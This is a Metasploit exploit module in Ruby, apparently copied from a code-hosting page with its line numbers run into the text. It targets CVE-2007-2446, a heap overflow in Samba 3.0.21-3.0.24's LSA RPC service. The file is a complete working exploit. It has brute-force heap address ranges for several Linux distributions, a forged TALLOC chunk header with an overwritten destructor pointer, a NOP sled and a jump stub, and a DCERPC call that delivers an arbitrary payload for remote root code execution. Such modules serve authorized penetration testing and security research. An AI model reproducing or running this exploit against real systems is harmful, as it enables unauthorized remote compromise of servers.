Path: blob/master/modules/exploits/linux/samba/lsa_transnames_heap.rb
21626 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::DCERPC9include Msf::Exploit::Remote::SMB::Client10include Msf::Exploit::Brute1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Samba lsa_io_trans_names Heap Overflow',17'Description' => %q{18This module triggers a heap overflow in the LSA RPC service19of the Samba daemon. This module uses the TALLOC chunk overwrite20method (credit Ramon and Adriano), which only works with Samba21versions 3.0.21-3.0.24. Additionally, this module will not work22when the Samba "log level" parameter is higher than "2".23},24'Author' => [25'Ramon de C Valle',26'Adriano Lima <adriano[at]risesecurity.org>',27'hdm'28],29'License' => MSF_LICENSE,30'References' => [31['CVE', '2007-2446'],32['OSVDB', '34699'],33],34'Privileged' => true,35'Payload' => {36'Space' => 1024 # no limit really37},38'Platform' => 'linux',39'DefaultOptions' => {40'PrependSetresuid' => true,41'PrependSetreuid' => true,42'PrependSetuid' => true43},44'Targets' => [45[46'Linux vsyscall',47{48'Platform' => 'linux',49'Arch' => [ ARCH_X86 ],50'Nops' => 1024,51'Bruteforce' =>52{53'Start' => { 'Ret' => 0xffffe410 },54'Stop' => { 'Ret' => 0xffffe413 },55'Step' => 156}57}58],5960##61# 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF62# 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm63# b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon64# 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon65# 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon66# 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm67# 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew68#69##7071[72'Linux Heap Brute Force (Debian/Ubuntu)',73{74'Platform' => 'linux',75'Arch' => [ ARCH_X86 ],76'Nops' => 64 * 1024,77'Bruteforce' =>78{79'Start' => { 'Ret' => 0x08352000 },80'Stop' => { 'Ret' => 0x0843d000 },81'Step' => 60 * 10248283}84}85],8687[88'Linux Heap Brute Force (Gentoo)',89{90'Platform' => 'linux',91'Arch' => [ ARCH_X86 ],92'Nops' => 64 * 1024,93'Bruteforce' =>94{95'Start' => { 'Ret' => 0x80310000 },96'Stop' => { 'Ret' => 0x8042f000 },97'Step' => 60 * 10249899}100}101],102103[104'Linux Heap Brute Force (Mandriva)',105{106'Platform' => 'linux',107'Arch' => [ ARCH_X86 ],108'Nops' => 64 * 1024,109'Bruteforce' =>110{111'Start' => { 'Ret' => 0x80380000 },112'Stop' => { 'Ret' => 0x8045b000 },113'Step' => 60 * 1024114115}116}117],118119[120'Linux Heap Brute Force (RHEL/CentOS)',121{122'Platform' => 'linux',123'Arch' => [ ARCH_X86 ],124'Nops' => 64 * 1024,125'Bruteforce' =>126{127'Start' => { 'Ret' => 0xb800f000 },128'Stop' => { 'Ret' => 0xb80c9000 },129'Step' => 60 * 1024130131}132}133],134135[136'Linux Heap Brute Force (SUSE)',137{138'Platform' => 'linux',139'Arch' => [ ARCH_X86 ],140'Nops' => 64 * 1024,141'Bruteforce' =>142{143'Start' => { 'Ret' => 0x80365000 },144'Stop' => { 'Ret' => 0x80424000 },145'Step' => 60 * 1024146147}148}149],150151[152'Linux Heap Brute Force (Slackware)',153{154'Platform' => 'linux',155'Arch' => [ ARCH_X86 ],156'Nops' => 64 * 1024,157'Bruteforce' =>158{159'Start' => { 'Ret' => 0x8033c000 },160'Stop' => { 'Ret' => 0x80412000 },161'Step' => 60 * 1024162163}164}165],166167[168'Linux Heap Brute Force (OpenWRT MIPS)',169{170'Platform' => 'linux',171'Arch' => [ ARCH_MIPSBE ],172'Nops' => 64 * 1024,173'Bruteforce' =>174{175'Start' => { 'Ret' => 0x55900000 },176'Stop' => { 'Ret' => 0x559c0000 },177'Step' => 60 * 1024178}179}180],181182[183'DEBUG',184{185'Platform' => 'linux',186'Arch' => [ ARCH_X86 ],187'Nops' => 1024,188'Bruteforce' =>189{190'Start' => { 'Ret' => 0xAABBCCDD },191'Stop' => { 'Ret' => 0xAABBCCDD },192'Step' => 4193}194}195],196],197'DisclosureDate' => '2007-05-14',198'DefaultTarget' => 0,199'Notes' => {200'Stability' => [CRASH_SERVICE_RESTARTS],201'Reliability' => [REPEATABLE_SESSION],202'SideEffects' => [IOC_IN_LOGS]203}204)205)206207register_options(208[209OptString.new('SMBPIPE', [ true, 'The pipe name to use', 'LSARPC']),210]211)212213deregister_options('SMB::ProtocolVersion')214end215216def check217connect(versions: [1])218smb_login219disconnect220221if smb_peer_lm =~ /Samba/i222return CheckCode::Detected223end224225CheckCode::Safe226rescue StandardError227return CheckCode::Safe228end229230def brute_exploit(target_addrs)231if (!@nops)232if (target['Nops'] > 0)233print_status('Creating nop sled....')234@nops = make_nops(target['Nops'])235else236@nops = ''237end238239# @nops = "\xcc" * (@nops.length)240end241242print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])243244nops = @nops245pipe = datastore['SMBPIPE'].downcase246247print_status('Connecting to the SMB service...')248connect(versions: [1])249smb_login250251if !@checked_peerlm && (smb_peer_lm !~ /Samba 3\.0\.2[1234]/i)252fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")253end254255@checked_peerlm = true256257datastore['DCERPC::fake_bind_multi'] = false258259handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])260print_status("Binding to #{handle} ...")261dcerpc_bind(handle)262print_status("Bound to #{handle} ...")263264jumper = 'P' * 256265jumper[24, 5] = "\xe9" + [-5229 - 11 - 5 - (nops.length / 2)].pack('V')266267num_entries = 256268num_entries2 = 272269270# first talloc_chunk271# 16 bits align272# 16 bits sid_name_use273# 16 bits uni_str_len274# 16 bits uni_max_len275# 32 bits buffer276# 32 bits domain_idx277buf = (('A' * 16) * num_entries)278279# padding280buf << 'A' * 8281282# TALLOC_MAGIC283talloc_magic = "\x70\xec\x14\xe8"284285# second talloc_chunk header286buf << NDR.long(0) + NDR.long(0) # next, prev287buf << NDR.long(0) + NDR.long(0) # parent, child288buf << NDR.long(0) # refs289buf << [target_addrs['Ret']].pack('V') # destructor290buf << 'A' * 4 # name291buf << 'A' * 4 # size292buf << talloc_magic # flags293buf << jumper294295stub = lsa_open_policy(dcerpc)296297stub << NDR.long(0) # num_entries298stub << NDR.long(0) # ptr_sid_enum299stub << NDR.long(num_entries) # num_entries300stub << NDR.long(0x20004) # ptr_trans_names301stub << NDR.long(num_entries2) # num_entries2302stub << buf303stub << nops304stub << payload.encoded305306print_status('Calling the vulnerable function...')307308begin309# LsarLookupSids310dcerpc.call(0x0f, stub)311rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError312print_status('Server did not respond, this is expected')313rescue Rex::Proto::DCERPC::Exceptions::Fault314print_error('Server is most likely patched...')315rescue StandardError => e316if e.to_s =~ /STATUS_PIPE_DISCONNECTED/317print_status('Server disconnected, this is expected')318else319print_error("Error: #{e.class}: #{e}")320end321end322323handler324disconnect325end326327def lsa_open_policy(dcerpc, server = '\\')328stubdata =329# Server330NDR.uwstring(server) +331# Object Attributes332NDR.long(24) + # SIZE333NDR.long(0) + # LSPTR334NDR.long(0) + # NAME335NDR.long(0) + # ATTRS336NDR.long(0) + # SEC DES337# LSA QOS PTR338NDR.long(1) + # Referent339NDR.long(12) + # Length340NDR.long(2) + # Impersonation341NDR.long(1) + # Context Tracking342NDR.long(0) + # Effective Only343# Access Mask344NDR.long(0x02000000)345346dcerpc.call(6, stubdata)347348dcerpc.last_response.stub_data[0, 20]349end350end351352353